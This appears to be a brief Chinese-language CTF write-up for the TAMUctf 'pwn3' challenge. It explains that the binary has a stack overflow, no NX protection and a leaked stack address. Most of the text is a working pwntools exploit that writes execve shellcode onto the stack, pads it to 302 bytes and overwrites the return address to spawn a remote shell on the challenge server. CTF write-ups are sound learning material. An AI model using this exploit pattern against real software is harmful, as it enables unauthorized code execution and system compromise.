checksec :
image.png
IDA:
image.png
这一道 就很常规了,栈溢出,没有开启NX,又给了栈的地址,很明显就是往栈写入shellcode,然后溢出跳转到栈上执行shellcode
exp:
from pwn import *
# p = process('./pwn3')
p = remote("pwn.tamuctf.com","4323")
shellcode = asm(shellcraft.sh())
p.recvuntil('journey ')
a = p.recv(10)
addr = int(a,16)
print hex(addr)
pause()
p.sendline(shellcode + (302-len(shellcode)) * 'a' + p32(addr))
p.interactive()